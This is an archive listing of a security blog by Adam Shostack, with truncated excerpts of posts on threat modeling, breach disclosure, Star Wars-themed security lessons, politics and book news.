Shostack + Friends Blog Archive

 

Rogue One Sequel already being filmed!

There’s some really interesting leaked photos and analysis by Charles Goodman. “Leaked photos from the Rogue One sequel (Mainly Speculation – Possible Spoilers).”

 

Rogue One: The Best Star Wars Yet?

Someone once asked me why I like Star Wars more than Star Trek. I was a bit taken aback, and he assumed that since I use it so much, I obviously prefer it. The real reason I use Star Wars is not that it’s better, but that there’s a small canon, and I don’t have […]

 

Earthrise

Image credit: Bill Anders, Apollo 8, launched this day, Dec 21, 1968.

 

Yahoo! Yippee? What to Do?

[Dec 20 update: The first draft of this post ended up with both consumer and enterprise advice, which made it complex. The enterprise half is now on the IANS blog: Never Waste a Good Crisis: Yahoo Edition.] Yesterday, Yahoo disclosed that attackers broke into Yahoo in 2013 and stole details on a billion accounts. Brian […]

 

Seeing the Big Picture

This quote from Bob Iger, head of Disney, is quite interesting for his perspective as a leader of a big company: There is a human side to it that I try to apply and consider. [But] the harder thing is to balance with the reality that not everything is perfect. In the normal course of […]

 

Do Games Teach Security?

There’s a new paper from Mark Thompson and Hassan Takabi of the University of North Texas. The title captures the question: Effectiveness Of Using Card Games To Teach Threat Modeling For Secure Web Application Developments Gamification of classroom assignments and online tools has grown significantly in recent years. There have been a number of card […]

 

Incentives, Insurance and Root Cause

Over the decade or so since The New School book came out, there’s been a sea change in how we talk about breaches, and how we talk about those who got breached. We agree that understanding what’s going wrong should be a bigger part of how we learn. I’m pleased to have played some part […]

 

Electoral Chaos

[Dec 15: Note that there are 4 updates to the post with additional links after writing.] The Green Party is driving a set of recounts that might change the outcome in one or more swing states. Simultaneously, there is a growing movement to ask the Electoral College to choose a candidate other than Donald Trump […]

 

Gavle Lessons: 56% Is Not Sufficiently More Secure!

In September, we shared the news that for its 50th year, the people of Gävle paid an extra $100,000 to secure the goat. Sadly, it seems to have not helped. Today, the goat tweeted: Oh no, such a short amount of time with you my friends. The obvious lesson is that the Swedes have a […]

 

Mac Command Line: Turning Apps into Commands

I moved to MacOS X because it offers both a unix command line and graphical interfaces, and I almost exclusively use the command line as I switch between tasks. If you use a terminal and aren’t familiar with the open command, I urge you to take a look. I tend to open documents with open […]

 

Election 2016

This election has been hard to take on all sorts of levels, and I’m not going to write about the crap. Everything to be said has been said, along which much that never should have been said, and much that should disqualify those who said it from running for President. I thought about endorsing Jill […]

 

The Breach Response Market Is Broken (and what could be done)

Much of what Andrew and I wrote about in the New School has come to pass. Disclosing breaches is no longer as scary, nor as shocking, as it was. But one thing we expected to happen was the emergence of a robust market of services for breach victims. That’s not happened, and I’ve been thinking […]

 

Secure Development or Backdoors: Pick One

In “Threat Modeling Crypto Back Doors,” I wrote: In the same vein, the requests and implementations for such back-doors may be confidential or classified. If that’s the case, the features may not go through normal tracking for implementation, testing, or review, again reducing the odds that they are secure. Of course, because such a system […]

 

Current Reading

[Update, Feb 20 2017: More reading: Trump and the ‘Society of the Spectacle’.]

 

Gavle Goat, now 56% more secure!

“We’ll have more guards. We’re going to try to have a ‘goat guarantee’ the first weekend,” deputy council chief Helene Åkerlind, representing the local branch of the Liberal Party, told newspaper Gefle Dagblad. “It is really important that it stays standing in its 50th year,” she added to Arbetarbladet. Gävle Council has decided to allocate […]

 

You say noise, I say data

There is a frequent claim that stock markets are somehow irrational and unable to properly value the impact of cyber incidents in pricing. (That’s not usually precisely how people phrase it. I like this chart of one of the largest credit card breaches in history: It provides useful context as we consider this quote: On […]

 

Why Don't We Have an Incident Repository?

Steve Bellovin and I provided some “Input to the Commission on Enhancing National Cybersecurity.” It opens: We are writing after 25 years of calls for a “NTSB for Security” have failed to result in action. As early as 1991, a National Research Council report called for “build[ing] a repository of incident data” and said “one […]

 

Diagrams in Threat Modeling

When I think about how to threat model well, one of the elements that is most important is how much people need to keep in their heads, the cognitive load if you will. In reading Charlie Stross’s blog post, “Writer, Interrupted” this paragraph really jumped out at me: One thing that coding and writing fiction […]

 

What Boards Want in Security Reporting

Recently, some of my friends were talking about a report by Bay Dynamics, “How Boards of Directors Really Feel About Cyber Security Reports.” In that report, we see things like: More than three in five board members say they are both significantly or very “satisfied” (64%) and “inspired”(65%) after the typical presentation by IT and […]

 

FBI says their warnings were ignored

There’s two major parts to the DNC/FBI/Russia story. The first part is the really fascinating evolution of public disclosures over the DNC hack. We know the DNC was hacked, that someone gave a set of emails to Wikileaks. There are accusations that it was Russia, and then someone leaked an NSA toolkit and threatened to […]

 

What does the MS Secure Boot Issue teach us about key escrow?

Nothing. No, seriously. Articles like “Microsoft Secure Boot key debacle causes security panic” and “Bungling Microsoft singlehandedly proves that golden backdoor keys are a terrible idea” draw on words in an advisory to say that this is all about golden keys and secure boot. This post is not intended to attack anyone; researchers, journalists or […]

 

Consultants Say Their Cyber Warnings Were Ignored

Back in October, 2014, I discussed a pattern of “Employees Say Company Left Data Vulnerable,” and its a pattern that we’ve seen often since. Today, I want to discuss the consultant’s variation on the story. This is less common, because generally smart consultants don’t comment on the security of their consultees. In this case, it […]

 

"Better Safe than Sorry!"

“Better safe than sorry” are the closing words in a NYT story, “A Colorado Town Tests Positive for Marijuana (in Its Water).” Now, I’m in favor of safety, and there’s a tradeoff being made. Shutting down a well reduces safety by limiting the supply of water, and in this case, they closed a pool, which […]

 

Dear Mr. President

U.S. President Barack Obama says he’s ”concerned” about the country’s cyber security and adds, ”we have to learn from our mistakes.” Dear Mr. President, what actions are we taking to learn from our mistakes? Do we have a repository of mistakes that have been made? Do we have a “capability” for analysis of these mistakes? […]

 

Donald Trump Facts

“My father likes to keep some anonymity. It’s who he is. It’s who he is as a person,” Eric Trump said. It should have been obvious. (Quote from Washington Post, July 6, 2016).

 

What's Classified, Doc? (The Clinton Emails and the FBI)

So I have a very specific question about the “classified emails”, and it seems not to be answered by “Statement by FBI Director James B. Comey on the Investigation of Secretary Hillary Clinton’s Use of a Personal E-Mail System .” A few quotes: From the group of 30,000 e-mails returned to the State Department, 110 […]

 

Happy Independence Day!

Since 2005, this blog has had a holiday tradition of posting “The unanimous Declaration of the thirteen united States of America.” Never in our wildest, most chaotic dreams, did we imagine that the British would one day quote these opening words: When in the Course of human events, it becomes necessary for one people to […]

 

Passwords 2016

I’m excited to see the call for papers for Passwords 2016. There are a few exciting elements. First, passwords are in a category of problems that someone recently called “garbage problems.” They’re smelly, messy, and no one really wants to get their hands dirty on them. Second, they’re important. Despite their very well-known disadvantages, and […]

 

A New Way to Tie Security to Business

As security professionals, sometimes the advice we get is to think about the security controls we deploy as some mix of “cloud access security brokerage” and “user and entity behavioral analytics” and “next generation endpoint protection.” We’re also supposed to “hunt”, “comply,” and ensure people have had their “awareness” raised. Or perhaps they mean “training,” […]

 

The Evolution of Apple’s Differential Privacy

Bruce Schneier comments on “Apple’s Differential Privacy:” So while I applaud Apple for trying to improve privacy within its business models, I would like some more transparency and some more public scrutiny. Do we know enough about what’s being done? No, and my bet is that Apple doesn’t know precisely what they’ll ship, and aren’t […]

 

Security Lessons from C-3PO

C-3PO: Sir, the possibility of successfully navigating an asteroid field is approximately 3,720 to 1. Han Solo: Never tell me the odds. I was planning to start this with a C-3PO quote, and then move to a discussion of risk and risk taking. But I had forgotten just how rich a vein George Lucas tapped […]

 

The Rhetorical Style of Drama

There is a spectre haunting the internet, the spectre of drama. All the powers of the social media have banded together to not fight it, because drama increases engagement statistics like nothing else: Twitter and Facebook, Gawker and TMZ, BlackLivesMatter and GamerGate, Donald Trump and Donald Trump, the list goes on and on. Where is […]

 

"Think Like an Attacker" is an opt-in mistake

I’ve repeatedly spoken out against “think like an attacker.” Now I’m going to argue from authority. In this long article, “The Obama Doctrine,” the President of the United States says “The degree of tribal division in Libya was greater than our analysts had expected.” So let’s think about that statement and what it means. First, […]

 

Humans in Security, BlackHat talks

This is a brief response to Steve Christey Coley, who wrote on Twitter, “but BH CFP reads mostly pure-tech, yet infosec’s more human-driven?” I can’t respond in 140, and so a few of my thoughts, badly organized: BlackHat started life as a technical conference, and there’s certain expectations about topics, content and quality, which have […]

 

RSA Planning

Have a survival kit: ricola, Purell, gatorade, advil and antacids can be brought or bought on site. Favorite talk (not by me): I look forward to Sounil Yu’s talk on “Understanding the Security Vendor Landscape Using the Cyber Defense Matrix.” I’ve seen an earlier version of this, and like the model he’s building a great […]

 

Secure Code is Hard, Let's Make it Harder!

I was confused about why Dan Kaminsky would say CVE-2015-7547 (a bug in glbc’s DNS handling) creates network attack surface for sudo. Chris Rohlf kindly sorted me out by mentioning that there’s now a -host option to sudo, of which I was unaware. I had not looked at sudo in depth for probably 20 years, […]

 

Sneak peeks at my new startup at RSA

Many executives have been trying to solve the problem of connecting security to the business, and we’re excited about what we’re building to serve this important and unmet need. If you present security with an image like the one above, we may be able to help. My new startup is getting ready to show our […]

 

Sneak peeks at my new startup at RSA

Many executives have been trying to solve the problem of connecting security to the business, and we’re excited about what we’re building to serve this important and unmet need. If you present security with an image like the one above, we may be able to help. My new startup is getting ready to show our […]

 

Kale Caesar

According to the CBC: “McDonald’s kale salad has more calories than a Double Big Mac” In a quest to reinvent its image, McDonald’s is on a health kick. But some of its nutrient-enhanced meals are actually comparable to junk food, say some health experts. One of new kale salads has more calories, fat and sodium […]

 

Superbowls

This is a superb owl, but its feathers are ruffled. It is certainly not a metaphor. Speaking of ruffled feathers, apparently there’s a kerfuffle about Super Bowl 1, where the only extant tape is in private hands, and there’s conflict over what to do with it. One aspect I haven’t seen covered is that 50 […]

 

Threat Modeling: Chinese Edition

I’m excited to say that Threat Modeling: Designing for Security is now available in Chinese. This is a pretty exciting milestone for me — it’s my first book translation, and it joins Elevation of Privilege as my second translation into Chinese. You can buy it from Amazon.cn.

 

Threat Modeling, Chinese Edition!

I’m excited to say that Threat Modeling: Designing for Security is now available in Chinese. This is a pretty exciting milestone for me — it’s my first book translation, and it joins Elevation of Privilege as my second translation into Chinese. You can buy it from Amazon.cn.

 

Security Blogger Awards

Voting for the 2016 Security Blogger Awards are now open, and this blog is nominated for most entertaining. Please don’t vote for us. Along with our sister blog, we’re aiming to dominate a new category next year, “most nominations without a win.”

 

"The Pentesters Strike Back"

Offered up without comment: Star Wars Episode IV.1.d: The Pentesters Strike Back from CyberPoint International on Vimeo.

 

The Pogues

Happy New Year! The Pogues are Launching their own brand of whiskey, and whatever you think of the band or of drinking, it’s hard to think of a more “on brand” product creation than this.

 

Cybersecurity Lessons from Star Wars: Blame Vader, Not the IT Department

In “The Galactic Empire Has Terrible Cybersecurity,” Alex Grigsby looks at a number of high-profile failures, covered in “A New Hope” and the rest of the Star Wars canon. Unfortunately, the approach he takes to the Galactic Empire obscures the larger, more dangerous issue is its cybersecurity culture. There are two errors in Grigsby’s analysis, […]

 

Governance Lessons from the Death Star Architect

I had not seen this excellent presentation by the engineer who built the Death Star’s exhaust system. In it, he discusses the need to disperse energy from a battle station with the power draw to destroy planets, and the engineering goals he had to balance. I’m reminded again of “The Evolution of Useful Things” and […]

 

Open Letters to Security Vendors

John Masserini has a set of “open letters to security vendors” on Security Current. Everyone involved in product or sales at a security startup should read them. John provides insight into what it’s like to be pitched by too many startups, and provides a level of transparency that’s sadly hard to find. Personally, I learned […]

 

Phishing and Clearances

Apparently, the CISO of US Homeland Security, a Paul Beckman, said that: “Someone who fails every single phishing campaign in the world should not be holding a TS SCI [top secret, sensitive compartmentalized information—the highest level of security clearance] with the federal government” (Paul Beckman, quoted in Ars technica) Now, I’m sure being in the […]

 

Survey for How to Measure Anything In Cybersecurity Risk

This is a survey from Doug Hubbard, author of How To Measure Anything and he is currently writing another book with Richard Seiersen (GM of Cyber Security at GE Healthcare) titled How to Measure Anything in Cybersecurity Risk. As part of the research for this book, they are asking for your assistance as an information […]

 

What Good is Threat Intelligence Going to do Against That?

As you may be aware, I’m a fan of using Star Wars for security lessons, such as threat modeling or Saltzer and Schroeder. So I was pretty excited to see Wade Baker post “Luke in the Sky with Diamonds,” talking about threat intelligence, and he gets bonus points for crossover title. And I think it’s […]

 

Towards a model of web browser security

One of the values of models is they can help us engage in areas where otherwise the detail is overwhelming. For example, C is a model of how a CPU works that allows engineers to defer certain details to the compiler, rather than writing in assembler. It empowers software developers to write for many CPU […]

 

Adam's new startup

A conversation with an old friend reminded me that there may be folks who follow this blog, but not the New School blog. Over there, I’ve posted “Improving Security Effectiveness” about leaving Microsoft to work on my new company: For the last few months, I’ve been working full time and talking with colleagues about a […]

 

Seeking a technical leader for my new company

We have a new way to measure security effectiveness, and want someone who’ll drive to delivering the technology to customers, while building a great place for developers to ship and deploy important technology. We are very early in the building of the company. The right person will understand such a “green field” represents both opportunity […]

 

The Drama Triangle

As we head into summer conference season, drama is as predictable as vulnerabilities. I’m really not fond of either. What I am fond of, (other than Star Wars), as someone who spends a lot of time thinking about models, is the model of the “drama triangle.” First discussed by Stephen Karpman, the triangle has three […]

 

Security Lessons from Healthcare.gov

There’s a great “long read” at CIO, “6 Software Development Lessons From Healthcare.gov’s Failed Launch.” It opens: This article tries to go further than the typical coverage of Healthcare.gov. The amazing thing about this story isn’t the failure. That was fairly obvious. No, the strange thing is the manner in which often conflicting information is […]

 

On Language

I was irked to see a tweet “Learned a new word! Pseudoarboricity: the number of pseudoforests needed to cover a graph. Yes, it is actually a word and so is pseudoforest.” The idea that some letter combinations are “actual words” implies that others are “not actual words,” and thus, that there is some authority who […]

 

The Web We Have to Save

Hossein Derakhshan was recently released from jail in Iran. He’s written a long and thoughtful article “The Web We Have to Save.” It’s worth reading in full, but here’s an excerpt: Some of it is visual. Yes, it is true that all my posts on Twitter and Facebook look something similar to a personal blog: […]

 

Improving Security Effectiveness

For the last few months, I’ve been working full time and talking with colleagues about a new way for security executives to measure the effectiveness of security programs. In very important ways, the ideas are new and non-obvious, and at the same time, they’re an evolution of the ideas that Andrew and I wrote about […]

 

What Happened At OPM?

I want to discuss some elements of the OPM breach and what we know and what we don’t. Before I do, I want to acknowledge the tremendous and justified distress that those who’ve filled out the SF-86 form are experiencing. I also want to acknowledge the tremendous concern that those who employ those with clearances […]

 

The Unanimous Declaration of the Thirteen United States of America

In CONGRESS, July 4, 1776 The unanimous Declaration of the thirteen united States of America, When in the Course of human events, it becomes necessary for one people to dissolve the political bands which have connected them with another, and to assume among the powers of the earth, the separate and equal station to which […]

 

PCI & the 166816 password

This was a story back around RSA, but I missed it until RSnake brought it up on Twitter: “[A default password] can hack nearly every credit card machine in the country.” The simple version is that Charles Henderson of Trustwave found that “90% of the terminals of this brand we test for the first time […]

 

Wassenaar Restrictions on Speech

[There are broader critiques by Katie Moussouris of HackerOne at “Legally Blind and Deaf – How Computer Crime Laws Silence Helpful Hackers” and Halvar Flake at “Why changes to Wassenaar make oppression and surveillance easier, not harder.” This post addresses the free speech issue.] During the first crypto wars, cryptography was regulated under the US […]

 

Threat Modeling Crypto Back Doors

Today, the Open Technology Institute released an open letter to the President of the United States from a broad set of organizations and experts, and I’m pleased to be a signer, and agree wholeheartedly with the text of the letter. (Some press coverage.) I did want to pile on with an excerpt from chapter 9 […]

 

Conference Etiquette: What’s New?

So Bill Brenner has a great article on “How to survive security conferences: 4 tips for the socially anxious .” I’d like to stand by my 2010 guide to “Black Hat Best Practices,” and augment it with something new: a word on etiquette. Etiquette is not about what fork you use (start from the outside, […]

 

Boyd Video: Patterns of Conflict

John Boyd’s ideas have had a deep impact on the world. He created the concept of the OODA Loop, and talked about the importance of speed (“getting inside your opponent’s loop”) and orientation, and how we determine what’s important. A lot of people who know about the work of John Boyd also know that he […]

 

The New Cyber Agency Will Likely Cyber Fail

The Washington Post reports that there will be a “New agency to sniff out threats in cyberspace.” This is my first analysis of what’s been made public. Details are not fully released, but there are some obvious problems, which include: “The quality of the threat analysis will depend on a steady stream of data from […]

 

What CSOs can Learn from Pete Carroll

If you listen to the security echo chamber, after an embarrassing failure like a data breach, you lose your job, right? Let’s look at Seahawks Coach Pete Carroll, who made what the home town paper called the “Worst Play Call Ever.” With less than a minute to go in the Superbowl, and the game hanging […]

 

An Infosec lesson from the "Worst Play Call Ever"

It didn’t take long for the Seahawk’s game-losing pass to get a label. But as Ed Felten explains, there’s actually some logic to it, and one of his commenters (Chris) points out that Marshawn Lynch scored in only one of his 5 runs from the one yard line this season. So, perhaps in a game […]

 

The Unexpected Meanings of Facebook Privacy Disclaimers

Paul Gowder has an interesting post over at Prawfblog, “In Defense of Facebook Copyright Disclaimer Status Updates (!!!).” He presents the facts: …People then decide that, hey, goose, gander, if Facebook can unilaterally change the terms of our agreement by presenting new ones where, theoretically, a user might see them, then a user can unilaterally […]

 

Security 101: Show Your List!

Lately I’ve noted a lot of people quoted in the media after breaches saying “X was Security 101. I can’t believe they didn’t do X!” For example, “I can’t believe that LinkedIn wasn’t salting passwords! That’s security 101!” Now, I’m unsure if that’s “security 101” or not. I think security 101 for passwords is “don’t […]

 

IOS Subject Key Identifier?

I’m having a problem where the “key identifier” displayed on my ios device does not match the key fingerprint on my server. In particular, I run: % openssl x509 -in keyfile.pem -fingerprint -sha1 and I get a 20 byte hash. I also have a 20 byte hash in my phone, but it is not that […]

 

Color-Changing Cats

Looking for something festive, holiday-like and chaotic for the blog, I came across color-changing cats. The history of color-changing cats is a fascinating one, involving Carl Sagan and accurate predictions of unfathomable chaos over the next ten thousand years. Because while we don’t know what life will be like that far in the future, consider […]

 

The Cliffs of Insanity!

Today’s “the future is cool” entry is the cliffs of insanity: Actually, I’m lying to you, they’re the Cliffs of Comet Churyumov–Gerasimenko, as photographed by the Rosetta spacecraft. I just think its cool similar they look, and how the physical processes which created the Cliffs of Moher may also have been at work on a […]

 

The Future Is So Cool

When you were growing up, 2014 was the future. And it’s become cliche to bemoan that we don’t have the flying cars we were promised, but did get early delivery on a dystopian surveillance state. So living here in the future, I just wanted to point out how cool it is that you can detect […]

 

Security Lessons from Drug Trials

When people don’t take their drugs as prescribed, it’s for very human reasons. Typically they can’t tolerate the side effects, the cost is too high, they don’t perceive any benefit, or they’re just too much hassle. Put these very human (and very subjective) reasons together, and they create a problem that medicine refers to as […]

 

Hate-watching, breaking and building

Listening to the radio, there was a discussion of how the folks at NBC were worried that people were going to “hatewatch” their new version of Peter Pan. Hatewatch. Like it’s a word. It’s fascinating. They discussed how people wanted to watch it to tweet cynically at its expense. The builder/breaker split isn’t just present […]

 

Chaos and Legitimacy

At BruCon 0x06, I was awoken from a nap to the sound of canons, and looked out my window to see soldiers marching through the streets. It turns out they were celebrating the 200th anniversary of the Treaty of Ghent. As I’m sure you’ll recall from history class Wikipedia, the Treaty of Ghent ended the […]

 

Threat Modeling At a Startup

I’ve been threat modeling for a long time, and at Microsoft, had the lovely opportunity to put some rigor into not only threat modeling, but into threat modeling in a consistent, predictable, repeatable way. Because I did that work at Microsoft, sometimes people question how it would work for a startup, and I want to […]

 

Think Like An Attacker? Flip that advice!

For many years, I have been saying that “think like an attacker” is bad advice for most people. For example: Here’s what’s wrong with think like an attacker: most people have no clue how to do it. They don’t know what matters to an attacker. They don’t know how an attacker spends their day. They […]

 

Modeling Attackers and Their Motives

There are a number of reports out recently, breathlessly presenting their analysis of one threatening group of baddies or another. You should look at the reports for facts you can use to assess your systems, such as filenames, hashes and IP addresses. Most readers should, at most, skim their analysis of the perpetrators. Read on […]

 

Phone Booths

This is a lovely little story about pay phones on Whidbey Island. Warning: those who spent too much time with phone systems in their youth may feel inexplicable nostalgia.

 

Thanks, Bruce!

Bruce Schneier says nice things about my latest book.

 

Employees Say Company Left Data Vulnerable

There’s a recurring theme in data breach stories: The risks were clear to computer experts inside $organization: The organization, they warned for years, might be easy prey for hackers. But despite alarms as far back as 2008, $organization was slow to raise its defenses, according to former employees. The particular quote is from “Ex-Employees Say […]

 

Jolt Award for Threat Modeling

I am super-pleased to report that Threat Modeling: Designing for Security has been named a Jolt Finalist, the first security-centered book to make that list since Schneier’s Secrets and Lies in 2001. My thanks to the judges, most especially to Gastón Hillar for the constructive criticism that “Unluckily, the author has chosen to focus on […]

 

BSides LV: Change Industry Or Change Professionals?

All through the week of BSides/BlackHat/Defcon, people came up to me to tell me that they enjoyed my BSides Las Vegas talk. (Slides, video). It got some press coverage, including an article by Jon Evans of TechCrunch, “Notes From Crazytown, Day One: The Business Of Fear.” Mr. Evans raises an interesting point: “the computer security […]

 

CERT, Tor, and Disclosure Coordination

There’s been a lot said in security circles about a talk on Tor being pulled from Blackhat. (Tor’s comments are also worth noting.) While that story is interesting, I think the bigger story is the lack of infrastructure for disclosure coordination. Coordinating information about vulnerabilities is a socially important function. Coordination makes it possible for […]

 

#Apollo45

July 20, 1969. I’ve blogged about it before. There are people who can write eloquently about events of such significance.  I am not one of them.  I hope that doesn’t stand in the way of folks remembering the amazing accomplishment that the Apollo program was.  

 

Etsy's Threat Modeling

Gabrielle Gianelli has pulled back the curtain on how Etsy threat modeled a new marketing campaign. (“Threat Modeling for Marketing Campaigns.”) I’m really happy to see this post, and the approach that they’ve taken: First, we wanted to make our program sustainable through proactive defenses. When we designed the program we tried to bake in […]

 

Mail Chaos

The mail system I’ve been using for the last 19 years is experiencing what one might call an accumulation of chaos, and so I’m migrating to a new domain, shostack.org. You can email me at my firstname@shostack.org, and my web site is now at http://adam.shostack.org I am sorry for any inconvenience this may cause. [Update: […]

 

What Security Folks Can Learn from Doctors

Stefan Larson talks about “What doctors can learn from each other:” Different hospitals produce different results on different procedures. Only, patients don’t know that data, making choosing a surgeon a high-stakes guessing game. Stefan Larsson looks at what happens when doctors measure and share their outcomes on hip replacement surgery, for example, to see which […]

 

Seattle event: Ada's Books

For Star Wars day, I’m happy to share this event poster for my talk at Ada’s Books in Seattle Technical Presentation: Adam Shostack shares Threat Modeling Lessons with Star Wars. This will be a less technical talk with plenty of discussion and interactivity, drawing on some of the content from “Security Lessons from Star Wars,” […]

 

Threat Modeling: The East Coast Book Tour

I’m planning to be on the East Coast from June 16-27, giving threat modeling book talks. (My very popular “Threat Modeling Lessons from Star Wars.”) I’m reaching out to find venues which would like me to come by and speak. My plan is to arrive in Washington DC on the 16th, and end in Boston, […]

 

There's more than one way to threat model

Today, most presentations on threat modeling talk about each phase of the process. They talk about how to model what you’re building, what can go wrong, and what to do about it. Those tightly coupled processes can be great if you’ve never heard of an approach to threat modeling. But they can add to the […]

 

Threat modeling the Dread Pirate Roberts way

It has to be said that no one in the Princess Bride is great at threat modeling. But one scene in particular stands out. It’s while they’re planning to attack the castle and rescue Buttercup: Westley: I mean, if we only had a wheelbarrow, that would be something. Inigo: Where we did we put that […]

 

Virtual assistant services?

I’m getting ready to announce an East coast book tour. In planning my Silicon Valley tour, I learned that between scheduling, getting the details needed out, making sure I knew where I was sleeping, there was a large amount of administrative work involved. So I’d like to hire someone to take care of all that […]

 

Threat Modeling & Devops: Like Peanut Butter & Jelly

George Hulme interviewed me for Devops.com, and the article is at “Q&A: Speaking DevOps and Threat Modeling.” Its obvious that devops is an important trend, andit’s important to understand how to align threat modeling to that world.

 

Should I Start Threat Modeling from Assets?

A couple of reviewers have commented that they have different perspective on assets. For example, in a review I very much appreciated, Gunnar Peterson says: I have slightly a different perspective on Shostack’s view on assets. The book goes into different views that launch the threat model, the approach advocated for in the book is […]

 

L'Academie Gawker

Via Poynter, we learn that the word “massive” has been banned on Gawker. We want to sound like regular adult human beings, not Buzzfeed writers or Reddit commenters,” new Gawker Editor Max Read says in a memo to the publication’s writers. Words like “epic,” “pwn” and “derp” are no longer welcome on the site. Read […]

 

RSA: Time for some cryptographic dogfood

One of the most effective ways to improve your software is to use it early and often.  This used to be called eating your own dogfood, which is far more evocative than the alternatives. The key is that you use the software you’re building. If it doesn’t taste good to you, it’s probably not customer-ready.  […]

 

Threat Modeling and Operations

One very important question that’s frequently asked is “what about threat modeling for operations?” I wanted to ensure that Threat Modeling: Designing for Security focused on both development and operations. To do that, I got help from Russ McRee. For those who don’t know Russ, he’s a SANS incident handler as well as a collegue […]

 

My Technical Editor: Chris Wysopal

When Wiley asked me about a technical editor for Threat Modeling: Designing for Security, I had a long list of requirements. I wanted someone who could consider the various scenarios where threat modeling is important, including software development and operations. I wanted someone who understood the topic deeply, and had the experience of teaching threat […]

 

Threat Modeling: Designing for Security

I am super-excited to announce that my new book, Threat Modeling: Designing for Security (Wiley, 2014) is now available wherever fine books are sold! The official description: If you’re a software developer, systems manager, or security professional, this book will show you how to use threat modeling in the security development lifecycle and the overall […]

 

Threat Modeling: Designing for Security

I am super-excited to announce that my new book, Threat Modeling: Designing for Security (Wiley, 2014) is now available wherever fine books are sold! The official description: If you’re a software developer, systems manager, or security professional, this book will show you how to use threat modeling in the security development lifecycle and the overall […]

 

P0wned! Don't make the same mistake I did

I fell victim to an interesting attack, which I am recounting here so that others may avoid it. In a nutshell, I fell victim to a trojan, which the malefactor was able to place in a trusted location in my search path. A wrapper obscured the malicious payload. Additionally, a second line of defense did […]

 

On Bitcoin

There’s an absolutely fascinating interview with Adam Back: “Let’s Talk Bitcoin Adam Back interview.” For those of you who don’t know Adam, he created Hashcash, which is at the core of Bitcoin proof of work. Two elements I’d like to call attention to in particular are: First, there’s an interesting contrast between Adam’s opinions and […]

 

Adam’s Mailing List and Commitment Devices

Yesterday, I announced that I’ve set up a mailing list. You may have noticed an unusual feature to the announcement: a public commitment to it being low volume, with a defined penalty ($1,000 to charity) for each time I break the rule. You might even be wondering why I did that. In the New School, […]

 

Getting Ready for a Launch

I’m getting ready for to announce a new project that I’ve been working on for quite a while. As I get ready, I was talking to friends in PR and marketing, and they were shocked and appalled that I don’t have a mailing list. It was a little like telling people in security that you […]

 

Please vote for the social security blogger awards!

Alan Shimmy has the nominations for the 2014 Social Security bloggers award! New School has been nominated for most entertaining, while Emergent Chaos has been nominated for best representing the security industry and the hall of fame.

 

Please vote for the social security blogger awards!

Alan Shimmy has the nominations for the 2014 Social Security bloggers award! New School has been nominated for most entertaining, while Emergent Chaos has been nominated for best representing the security industry and the hall of fame. Now, I have no idea what it means that Emergent Chaos would represent the security industry. I’m hopeful […]

 

The Worst User Experience In Computer Security?

I’d like to nominate Xfinity’s “walled garden” for the worst user experience in computer security. For those not familiar, Xfinity has a “feature” called “Constant Guard” in which they monitor your internet for (I believe) DNS and IP connections for known botnet command and control services. When they think you have a bot, you see […]

 

Workshop on the Economics of Information Security (WEIS)

The 13th annual Workshop on the Economic of Information Security will be held at Penn State June 23-24, and the call for papers is now open. I’m on the program committee this year, and am looking forward to great submissions.

 

Transparency: When Security Pros Get Popped

Rich Mogul over at Securosis (N.B. I’m a contributing analyst there) has a great post on how, due to human error, some of his AWS credentials got nabbed by some miscreants and abused. We here at the New School love it when folks share how they were compromised and what they did about it. It […]

 

What's Copyright, Doc?

I blogged yesterday about all the new works that have entered the public domain as their copyright expired in the United States. If you missed it, that’s because exactly nothing entered the public domain yesterday. Read more — but only commentary, because there’s no newly free work — at “What Could Have Entered the Public […]

 

What to do for randomness today?

In light of recent news, such as “FreeBSD washing Intel-chip randomness” and “alleged NSA-RSA scheming,” what advice should we give engineers who want to use randomness in their designs? My advice for software engineers building things used to be to rely on the OS to get it right. That defers the problem to a small […]

 

Gavle Goat Goes Later This Year

The Gavle Goat has burned again, according to The Local.Se, and of course, it’s Twitter account (yet one more way in which real name policies inhibit natural behavior). Two quick comments. First, the goat survived longer this year than usual. Second, I think it illustrates something. I’m not sure what. But my yule would be […]

 

What Price Privacy, Paying For Apps edition

There’s a new study on what people would pay for privacy in apps. As reported by Techflash: A study by two University of Colorado Boulder economists, Scott Savage and Donald Waldman, found the average user would pay varying amounts for different kinds of privacy: $4.05 to conceal contact lists, $2.28 to keep their browser history […]

 

Like the birds…

Emergent Chaos has migrated.  It’s a long story, and perhaps better left untold.  Please let us know if you see issues with the new site.

 

A Mini-Review of "The Practice of Network Security Monitoring"

Recently the kind folks at No Starch Press sent me a review copy of Rich Bejtlich’s newest book The Practice of Network Security Monitoring and I can’t recommend it enough. It is well worth reading from a theory perspective, but where it really shines is digging into the nuts and bolts of building an NSM […]

 

What will the archaeologists think?

Over at the BBC, we read that the “home of Anakin Skywalker threatened by dune,” with awesome pictures: So my question is, what will archaeologists think in 1,000 years when they dig this up? How many careers will be wasted trying to link the bizarre architecture to some real culture? How many anthropologists will be […]

 

Academic job opening at Cambridge

At Light Blue Touchpaper, Ross Anderson says “We have a vacancy for a postdoc to work on the psychology of cybercrime and deception for two years from October.” I think this role has all sorts of fascinating potential, and wanted to help get the word out in my own small way.

 

Which and That

Can we just agree that “which” and “that” are pretty much interchangable? If you’re relying on a modern audience to be able to perceive the difference in meaning between restrictive and non-restrictive clauses, you’ve pretty much already lost. Which, as they say, makes a mockery of that rule. Alternately, “That, as they say, makes a […]

 

A Very Late Book Review

I have to start off by apologizing for how very late this review is, an embarrassing long time ago, the kind folks at No Starch Press very kindly gave me a copy of “Super Scratch Programming Adventure” to review. Scratch for those that aren’t familiar is a kids oriented programming language designed by Mitchel Resnick […]

 

Google Reader Going Away

Remarkably, some software that people host on your behalf, where you have no contract or just a contract of adhesion, can change at any time. This isn’t surprising to those who study economics, as all good New School readers try to do. However, this is a reminder/request that when you move, please resubscribe to New […]

 

Google Reader Going Away

Well, the world is full of chaos, some good and some bad, and today’s bad for those of you reading via Google Reader is that it’s going the way of Altavista (can you believe it was still around?) So as you migrate away, please consider including Emergent Chaos in your migration–we’ll have new content here […]

 
 

WordPress Update

I’ve updated to the latest WordPress for security fixes. Please let me know if you notice problems (blogname-at-gmail-com)

 

Privacy Enhancing Technologies Registration now open

The program for the 2013 Privacy Enhancing Technologies Symposium is up, and there’s a lot of fascinating looking papers and talks. If you’re interested, registration is also open. PETS is one of my favorite conferences of the year.

 

Replacing Flickr?

